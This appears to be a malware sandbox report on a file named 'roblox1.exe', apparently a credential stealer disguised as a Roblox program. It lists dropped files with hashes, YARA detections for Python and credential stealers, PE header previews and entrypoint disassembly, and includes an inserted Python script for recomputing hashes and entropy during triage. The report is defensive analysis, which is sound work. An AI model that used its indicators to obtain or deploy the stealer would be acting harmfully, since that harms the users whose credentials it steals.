SSDEEP:49152:Hvisa2OcIo0UYN1YA2sBCT7I0XIU6iOGtlqNVwASO0AIjoI+b0vjemXSKSDhxlT3:Pi/2PTYDBCT7NY+gTNxY7GbdJ295x
MD5:81AD4F91BB10900E3E2E8EAF917F42C9
SHA1:840F7AEF02CDA6672F0E3FC7A8D57F213DDD1DC6
SHA-256:5F20D6CEC04685075781996A9F54A78DC44AB8E39EB5A2BCF3234E36BEF4B190
SHA-512:11CD299D6812CDF6F0A74BA86EB44E9904CE4106167EBD6E0B81F60A5FCD04236CEF5CFF81E51ED391F5156430663056393DC07353C4A70A88024194768FFE9D
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\roblox1.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):86016
Entropy (8bit):5.9308989665858585
Encrypted:false
SSDEEP:1536:ZmwCw3vZ1w4vI1FxF6S2s0suvV81dvUflo6vp9862WhFo1emYU+:Z/CwxqC+bsNlflo6h93FiemYL
MD5:911470750962640CEB3FD11E2AEECD14
SHA1:AF797451D4028841D92F771885CB9D81AFBA3F96
SHA-256:5C204F6966526AF4DC0C0D6D29909B6F088C4FA781464F2948414D833B03094D
SHA-512:637043C20DC17FBC472613C0E4F576F0A2211B7916B3488806AEC30271CF1BD84BD790518335B88910662FD4844F8ED39FA75AA278577271A966756B8CD793F7
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\roblox1.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):3439512
Entropy (8bit):6.096012359425593
Encrypted:false
SSDEEP:98304:kw+jlHDGV+EafwAlViBksm1CPwDv3uFfJ1:1slHDG2fwAriXm1CPwDv3uFfJ1
MD5:AB01C808BED8164133E5279595437D3D
SHA1:0F512756A8DB22576EC2E20CF0CAFEC7786FB12B
SHA-256:9C0A0A11629CCED6A064932E95A0158EE936739D75A56338702FED97CB0BAD55
SHA-512:4043CDA02F6950ABDC47413CFD8A0BA5C462F16BCD4F339F9F5A690823F4D0916478CAB5CAE81A3D5B03A8A196E17A716B06AFEE3F92DEC3102E3BBC674774F2
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\roblox1.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):32792
Entropy (8bit):6.3566777719925565
Encrypted:false
SSDEEP:384:2nypDwZH1XYEMXvdQOsNFYzsQDELCvURDa7qscTHstU0NsICwHLZxXYIoBneEAR8:2l0Vn5Q28J8qsqMttktDxOpWDG4yKRF
MD5:EEF7981412BE8EA459064D3090F4B3AA
SHA1:C60DA4830CE27AFC234B3C3014C583F7F0A5A925
SHA-256:F60DD9F2FCBD495674DFC1555EFFB710EB081FC7D4CAE5FA58C438AB50405081
SHA-512:DC9FF4202F74A13CA9949A123DFF4C0223DA969F49E9348FEAF93DA4470F7BE82CFA1D392566EAAA836D77DDE7193FED15A8395509F72A0E9F97C66C0A096016
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\roblox1.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):698784
Entropy (8bit):5.533720236597082
Encrypted:false
SSDEEP:12288:waXWJ978LddzAPcWTWxYx2OCf2QmAr39Zu+DIpEpXKWRq0qwMUxQU2lvz:dddzAjKnD/QGXKzpwMUCU2lvz
MD5:DE72697933D7673279FB85FD48D1A4DD
SHA1:085FD4C6FB6D89FFCC9B2741947B74F0766FC383
SHA-256:ED1C8769F5096AFD000FC730A37B11177FCF90890345071AB7FBCEAC684D571F
SHA-512:0FD4678C65DA181D7C27B19056D5AB0E5DD0E9714E9606E524CDAD9E46EC4D0B35FE22D594282309F718B30E065F6896674D3EDCE6B3B0C8EB637A3680715C2C
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\roblox1.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):47616
Entropy (8bit):5.316469446718147
Encrypted:false
SSDEEP:768:3Y2vE6F6hmSrnDe651sYEYMXMBkYcE6n0/d3g:oAoVDeWlEEBkYcDni
MD5:95463F615865A472F75DDB365644A571
SHA1:91F22EF3F2FFD3E9D6CE6E58BEEA9A96287B090B
SHA-256:9EE77474D244A17337D4CCC5113FE4AF7B4D86F9969293A884927718D06E63C8
SHA-512:E3CCCCE9EBF5E7CF33E68046D3E7B59E454CCB791635EB5F405977FD270126EF8B58E6288DBE58C96B681361D81EF28720EBA8D0BD389BFB0F4C3114D098A117
Malicious:true
Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........o.T.............v?............v........................&{................................S.............Rich............PE..d....|.f.........." ...).\...`......`^....................................................`.............................................d.......d...............................L.......................................@............p...............................text....Z.......\.................. ..`.rdata...,...p.......`..............@..@.data....#..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..L...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):198568
                                                                                                                                                                                                                                  Entropy (8bit):6.360283939217406
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:rkPTemtXBsiLC/QOSL6XZIMuPbBV3Dy9zeL9ef93d1BVdOd8dVyio0OwUpz1RPoi:AKmVG/pxIMuPbBFEFDBwpp2W
                                                                                                                                                                                                                                  MD5:6BC89EBC4014A8DB39E468F54AAAFA5E
                                                                                                                                                                                                                                  SHA1:68D04E760365F18B20F50A78C60CCFDE52F7FCD8
                                                                                                                                                                                                                                  SHA-256:DBE6E7BE3A7418811BD5987B0766D8D660190D867CD42F8ED79E70D868E8AA43
                                                                                                                                                                                                                                  SHA-512:B7A6A383EB131DEB83EEE7CC134307F8545FB7D043130777A8A9A37311B64342E5A774898EDD73D80230AB871C4D0AA0B776187FA4EDEC0CCDE5B9486DBAA626
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O...........6...k.....k.....k.....k.....o............|.o.....o.....o.Z...o.....Rich..................PE..d....K.b.........." ... ............0................................................0....`.........................................`...P................................)..........@6..T............................5..@............ ...............................text...K........................... ..`.rdata....... ......................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):64936
                                                                                                                                                                                                                                  Entropy (8bit):6.1037683983631625
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:kD8LeBLeeFtp5V1BfO2yvSk70QZF1nEyjnskQkr/RFB1qucwdBeCw0myou6ZwJqL:kDwewnvtjnsfwaVISQ0a7SydEnn
                                                                                                                                                                                                                                  MD5:07BD9F1E651AD2409FD0B7D706BE6071
                                                                                                                                                                                                                                  SHA1:DFEB2221527474A681D6D8B16A5C378847C59D33
                                                                                                                                                                                                                                  SHA-256:5D78CD1365EA9AE4E95872576CFA4055342F1E80B06F3051CF91D564B6CD09F5
                                                                                                                                                                                                                                  SHA-512:DEF31D2DF95CB7999CE1F55479B2FF7A3CB70E9FC4778FC50803F688448305454FBBF82B5A75032F182DFF663A6D91D303EF72E3D2CA9F2A1B032956EC1A0E2A
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........f..A.e.A.e.A.e.%}m.@.e.%}e.@.e.%}..@.e.%}g.@.e.RichA.e.........................PE..d....K.b.........." ... ..................................................................`.........................................`...`................................)..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4493736
                                                                                                                                                                                                                                  Entropy (8bit):6.465157771728023
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:49152:5vL1txd/8sCmiAiPw+RxtLzli0Im3wOc+28Ivu31WfbF9PtF+FNDHaSclAaBlh7y:Dw7Ad07RmodacSeSHCMTbSp4PS
                                                                                                                                                                                                                                  MD5:C80B5CB43E5FE7948C3562C1FFF1254E
                                                                                                                                                                                                                                  SHA1:F73CB1FB9445C96ECD56B984A1822E502E71AB9D
                                                                                                                                                                                                                                  SHA-256:058925E4BBFCB460A3C00EC824B8390583BAEF0C780A7C7FF01D43D9EEC45F20
                                                                                                                                                                                                                                  SHA-512:FAA97A9D5D2A0BF78123F19F8657C24921B907268938C26F79E1DF6D667F7BEE564259A3A11022E8629996406CDA9FA00434BB2B1DE3E10B9BDDC59708DBAD81
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+.o...o...o.......m.......b.......c.......g.......k...f.`.u......f...o...3..............n.......n.......n...Richo...................PE..d....K.b.........." ... ..#...!.....|!........................................E.....{.D...`..........................................G=.......>.|.....E.......B......hD..)....E..t...Q%.T...........................`P%.@.............#.0............................text.....#.......#................. ..`.rdata...\....#..^....#.............@..@.data... ....0>.......>.............@....pdata........B.. ....A.............@..@PyRuntim`.....D.......C.............@....rsrc.........E.......C.............@..@.reloc...t....E..v....C.............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):29096
                                                                                                                                                                                                                                  Entropy (8bit):6.4767692602677815
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:rPxHeWt+twhCBsHqF2BMXR6VIS7GuIYiSy1pCQkyw24i/8E9VFL2Ut8JU:ZeS+twhC6HqwmYVIS7GjYiSyv7VeEdH
                                                                                                                                                                                                                                  MD5:ADC412384B7E1254D11E62E451DEF8E9
                                                                                                                                                                                                                                  SHA1:04E6DFF4A65234406B9BC9D9F2DCFE8E30481829
                                                                                                                                                                                                                                  SHA-256:68B80009AB656FFE811D680585FAC3D4F9C1B45F29D48C67EA2B3580EC4D86A1
                                                                                                                                                                                                                                  SHA-512:F250F1236882668B2686BD42E1C334C60DA7ABEC3A208EBEBDEE84A74D7C4C6B1BC79EED7241BC7012E4EF70A6651A32AA00E32A83F402475B479633581E0B07
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{?t..Q'..Q'..Q'.b.'..Q'.`P&..Q'.`T&..Q'.`U&..Q'.`R&..Q'.`P&..Q'..P'..Q'5hP&..Q'.`\&..Q'.`Q&..Q'.`.'..Q'.`S&..Q'Rich..Q'........................PE..d....K.b.........." ... .....2......................................................l.....`..........................................@..L....@..x....p.......`.......H...)......L....3..T............................2..@............0...............................text............................... ..`.rdata..H....0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1445800
                                                                                                                                                                                                                                  Entropy (8bit):6.579172773828651
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24576:tU3g/eNVQHzcayG7b99ZSYR4eXj98nXMuVp+qbLKeq98srCIS:ck3hbEAp8X9Vp+2q2gI
                                                                                                                                                                                                                                  MD5:926DC90BD9FAF4EFE1700564AA2A1700
                                                                                                                                                                                                                                  SHA1:763E5AF4BE07444395C2AB11550C70EE59284E6D
                                                                                                                                                                                                                                  SHA-256:50825EA8B431D86EC228D9FA6B643E2C70044C709F5D9471D779BE63FF18BCD0
                                                                                                                                                                                                                                  SHA-512:A8703FF97243AA3BC877F71C0514B47677B48834A0F2FEE54E203C0889A79CE37C648243DBFE2EE9E1573B3CA4D49C334E9BFE62541653125861A5398E2FE556
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|{.............e.......g.......g.......g.......g......Po...............g.......g.......g.....g......Rich............PE..d....L.b.........." ... ..................................................... .......`....`..............................................!...................0...........)......|...Pg..T............................f..@............ ..(............................text............................... ..`.rdata..D.... ......................@..@.data...0A.......8..................@....pdata.......0......................@..@.rsrc...............................@..@.reloc..|...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):16927744
Entropy (8bit):6.302956053733049
Encrypted:false
SSDEEP:98304:q1AOB/8NakwZBOCjzAI3WtPV+SBMmL5kPAcEpbfNuHb9BwPmBPwYqMx7dF5C/qqS:q1AlAkDw/s05IrNpdc0
MD5:6FE46FD6E5B143F5114E6616C59B703C
SHA1:D7EC21B14605DEDB9FA17FE94FDD4F38F27E46DD
SHA-256:5DE7D49690EDDFC6C109081D498ECAE18EDB6D980A7380C05B0AADE16A75D09A
SHA-512:B339DF96044A205713BFF7E5B7341233017697966C69D26B8C8D9E6B216481D5401970E9AE9F2EE6285469C1DE451033F8BC3A967B10657226665D4472B46250
Malicious:true
Yara Hits:
• Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, Author: Joe Security
• Rule: JoeSecurity_MonsterStealer, Description: Yara detected Monster Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 71%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Jg...............+.....H......%..........@.........................................`.....................................................49.....8.R......G.......................................... N..(.......................(............................text...X...........................`..`.data...0....0....... ..............@....rdata..............................@..@.eh_fram.............|..............@....pdata...G.......H...~..............@..@.xdata.............................@..@.bss.....................................idata..49.......:...z..............@....CRT....`..........................@....tls...............................@....rsrc...8.R......R.................@..@.reloc...............@..............@..B................................................................................................................................

Process:C:\Users\user\Desktop\roblox1.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1121192
Entropy (8bit):5.384501252071814
Encrypted:false
SSDEEP:12288:bMYYMmuZ63NoQCb5Pfhnzr0ql8L8koM7IRG5eeme6VZyrIBHdQLhfFE+uz9O:AYYuXZV0m8wMMREtV6Vo4uYz9O
MD5:102BBBB1F33CE7C007AAC08FE0A1A97E
SHA1:9A8601BEA3E7D4C2FA6394611611CDA4FC76E219
SHA-256:2CF6C5DEA30BB0584991B2065C052C22D258B6E15384447DCEA193FDCAC5F758
SHA-512:A07731F314E73F7A9EA73576A89CCB8A0E55E53F9B5B82F53121B97B1814D905B17A2DA9BD2EDA9F9354FC3F15E3DEA7A613D7C9BC98C36BBA653743B24DFC32
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(..F...F...F......F..G...F..C...F..B...F..E...F...G...F.C.G...F...G...F...K...F...F...F.......F...D...F.Rich..F.........................PE..d....K.b.........." ... .B...........*.......................................@......Y.....`.............................................X...(........ ...................)...0......@b..T............................a..@............`..x............................text....A.......B.................. ..`.rdata......`.......F..............@..@.data...............................@....pdata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................

Process:C:\Users\user\Desktop\roblox1.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):98736
Entropy (8bit):6.474996871326343
Encrypted:false
SSDEEP:1536:BxhUQePlHhR46rXHHGI+mAAD4AeDuXMycecb8i10DWZz:Bvk4wHH+mZD4ADAecb8G1
MD5:F12681A472B9DD04A812E16096514974
SHA1:6FD102EB3E0B0E6EEF08118D71F28702D1A9067C
SHA-256:D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
SHA-512:7D3ACCBF84DE73FB0C5C0DE812A9ED600D39CD7ED0F99527CA86A57CE63F48765A370E913E3A46FFC2CCD48EE07D823DAFDD157710EEF9E7CC1EB7505DC323A2
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.&k..H8..H8..H8.I9..H8...8..H8..I8(.H8e.K9..H8e.L9..H8e.M9..H8e.H9..H8e..8..H8e.J9..H8Rich..H8................PE..d....9............" ... .....`......`.....................................................`A........................................0C..4...dK...............p..p....Z...'...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......B..............@....pdata..p....p.......F..............@..@_RDATA..\............R..............@..@.rsrc................T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................................

Process:C:\Users\user\Desktop\roblox1.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):54784
Entropy (8bit):5.745430306227729
Encrypted:false
SSDEEP:768:luW10HHYD8RU55Wo0YixccXdyNkj32cf4p9hQQv5QbxiXjoltOanMvydo:lueEHBMIo0ZxcEyNOn4/+iXjYMvy
MD5:6FB550DDAEE31AFEDD29BDB97E2525F2
SHA1:B58257F37C581F143176D0C7ABD3A98FEC75A12F
SHA-256:33A9B6F1CAEDE0DBC9EE83097DEA21C6DB0A5CABFF27F2917EA94CF47688E9DF
SHA-512:DBEB69892C63238AEA76422815E45B7B1E12A7D2A0BCC6170F690B68EB56BC04C071413885FCE81CC6CE435D9C60C36D9B97C792C75C21541DB612C48124DF38
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........o.Z.............v?..............v..............................f{...........................S...........Rich............................PE..d....X.f.........." ...).....Z...............................................0............`.........................................`...d.......d...............,............ ......`............................... ...@............................................text............................... ..`.rdata...8.......:..................@..@.data...0...........................@....pdata..,...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

Process:C:\Users\user\Desktop\roblox1.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):95744
Entropy (8bit):5.981540506645796
Encrypted:false
SSDEEP:1536:rcNWyKPvIOrTasrpKBbylBwq9FJwHGa6NWfJc97JxtR:4wyyvIAasrEBOwIH0GaPJc97JxtR
MD5:6809491F7B8AD46A7281E222CA71745A
SHA1:138C75BFB03B1D54CD62FE14C3DC4501CB418397
SHA-256:80660605AE26882225D02D130D0A84927635A79C78055C2EEDE010A28E84EB32
SHA-512:97B498E3F69DE6CCC4F3373683D9E2AAE67CBE2532508A7677738702BBAF02EBD7C05C26E53CEBB076F9943EEA59B1AC4B9F7EE71A1626B8E31E539D009B39E8
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J..].....................;......E.......;.......;.......;.....................F:......F:......F:j.....F:......Rich............PE..d...!X.f.........." ...)..................................................................`..........................................X..d...4Y..x...............................,....G..............................PF..@............ ..`............................text............................... ..`.rdata...M... ...N..................@..@.data...@7...p.......Z..............@....pdata...............f..............@..@.rsrc................r..............@..@.reloc..,............t..............@..B................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
File Type:data
Category:dropped
Size (bytes):32768
Entropy (8bit):0.017262956703125623
Encrypted:false
SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:B7C14EC6110FA820CA6B65F5AEC85911
SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:false
Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
File Type:data
Category:dropped
Size (bytes):32768
Entropy (8bit):0.017262956703125623
Encrypted:false
SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:B7C14EC6110FA820CA6B65F5AEC85911
SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:false
Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
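The dropped-file records above list, for each artefact, a libmagic-style File Type, the size, an 8-bit Shannon entropy, and MD5/SHA1/SHA-256/SHA-512 digests. A responder who has pulled the same files from a host will want to recompute those fields offline and compare them against the report before trusting the match. The following is an added example, not Joe Sandbox's own code: it recomputes the hashes and entropy, and re-derives the "PE32+ executable (DLL) (GUI) x86-64, for MS Windows" style description from the DOS/COFF/optional headers. The HIGH_ENTROPY threshold is an assumption of this example (the report does not state how it derives its Encrypted flag), the PE header it builds for demonstration is constructed here rather than taken from the sample, and SSDEEP is omitted because it needs a third-party library.

```python
"""Recompute the static triage fields a sandbox report lists for a dropped file."""
import hashlib
import math
import struct
from typing import Optional

# Assumed threshold (not from the report): an 8-bit entropy this close to 8.0
# almost always means compressed, packed or encrypted content, as with the
# 7.997-entropy onefile sample whose stub.exe extracted the files above.
HIGH_ENTROPY = 7.2

MACHINES = {0x14C: "i386", 0x8664: "x86-64", 0xAA64: "ARM64"}
SUBSYSTEMS = {2: "GUI", 3: "console"}
IMAGE_FILE_DLL = 0x2000


def shannon_entropy_8bit(data: bytes) -> float:
    """Entropy in bits per byte, 0.0 (all one value) to 8.0 (uniform)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def digests(data: bytes) -> dict:
    """Same four digests the report prints, upper-cased like the report."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def describe_pe(data: bytes) -> Optional[str]:
    """Return a libmagic-style PE description, or None if this is not a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    opt = e_lfanew + 4 + 20                      # optional header follows the COFF header
    if opt + 70 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, _, _, _, _, _, characteristics = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    magic = struct.unpack_from("<H", data, opt)[0]
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]   # same offset for PE32 and PE32+
    parts = [{0x10B: "PE32", 0x20B: "PE32+"}.get(magic, "PE?"), "executable"]
    if characteristics & IMAGE_FILE_DLL:
        parts.append("(DLL)")
    parts.append("(%s)" % SUBSYSTEMS.get(subsystem, "subsystem %d" % subsystem))
    parts.append(MACHINES.get(machine, "machine 0x%x" % machine))
    return " ".join(parts) + ", for MS Windows"


def triage(data: bytes) -> dict:
    """Assemble the record fields so they can be diffed against the report."""
    ent = shannon_entropy_8bit(data)
    return {
        "File Type": describe_pe(data) or "data",
        "Size (bytes)": len(data),
        "Entropy (8bit)": ent,
        "Likely packed/encrypted": ent >= HIGH_ENTROPY,
        **digests(data),
    }


def build_minimal_pe(machine=0x8664, dll=True, subsystem=2, magic=0x20B) -> bytes:
    """Constructed sample header, not bytes from the report: just enough for describe_pe()."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)            # e_lfanew -> PE signature at 0x40
    characteristics = 0x0002 | (IMAGE_FILE_DLL if dll else 0)
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 240, characteristics)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, 68, subsystem)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    for name, blob in [("constructed DLL header", build_minimal_pe()),
                       ("32 KiB of zeros", bytes(32768))]:
        print(name)
        for k, v in triage(blob).items():
            print("  %s:%s" % (k, v))
```

On a real dropped file, read it in binary mode and pass the bytes to triage(); a digest mismatch against the report means you are looking at a different build of the artefact, and a near-zero entropy with File Type "data", like the two 32768-byte files from stub.exe above, is the signature of a mostly-empty buffer rather than of a payload.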
File type: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit): 7.997435059161403
TrID:
• Win64 Executable (generic) (12005/4) 74.95%
• Generic Win/DOS Executable (2004/3) 12.51%
• DOS Executable Generic (2002/1) 12.50%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name: roblox1.exe
File size: 11'168'256 bytes
MD5: cd463d16cf57c3a9f5c9588a878a7213
SHA1: ef22c2b11efc0bc6a739b82f9a26edaee9348b8f
SHA256: 49f4789274e5c0dcd4d2cc1b850761353bf8b72e819d12df5c376fd665da1283
SHA512: 5b20ce36b15f5d002d183850032067b11f811544bac19e0a76340df47294d0b059fa8dc43fedd8480d6f72eb8357d01924dbe9cbebdaac1625c5f4f498392822
SSDEEP: 196608:1a4vbUQYRyS/Kh44vTM1NExeka13ZlfNf5PWwShXBFPHIG1MZBwYFCnvkC2:7vDX0gZvT2U/S3ZllEhxFPIG1rYFC8C
TLSH: D4B63322E24350D8D14BD0F0DA866BE2A438FCB48276D47FA382F76F6319D544BACB55
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Jg...............+.....f...>..%..........@............................. ......VP....`... ............................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x140001125
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x140000000
Subsystem: windows cui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x674AFD18 [Sat Nov 30 11:55:04 2024 UTC]
TLS Callbacks: 0x40014ca0, 0x1, 0x40014d60, 0x1
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 0cad4d75817cf5181c89bf958567a0e8
Instruction (entrypoint disassembly)
push ebp
dec eax
mov ebp, esp
dec eax
sub esp, 30h
mov dword ptr [ebp-04h], 000000FFh
dec eax
mov eax, dword ptr [0001E985h]
mov dword ptr [eax], 00000000h
call 00007F06692E2FE3h
mov dword ptr [ebp-04h], eax
nop
nop
mov eax, dword ptr [ebp-04h]
dec eax
add esp, 30h
pop ebp
ret
push ebp
dec eax
mov ebp, esp
dec eax
sub esp, 70h
dec eax
mov dword ptr [ebp-10h], 00000000h
mov dword ptr [ebp-1Ch], 00000030h
mov eax, dword ptr [ebp-1Ch]
dec eax
mov eax, dword ptr [eax]
dec eax
mov dword ptr [ebp-28h], eax
dec eax
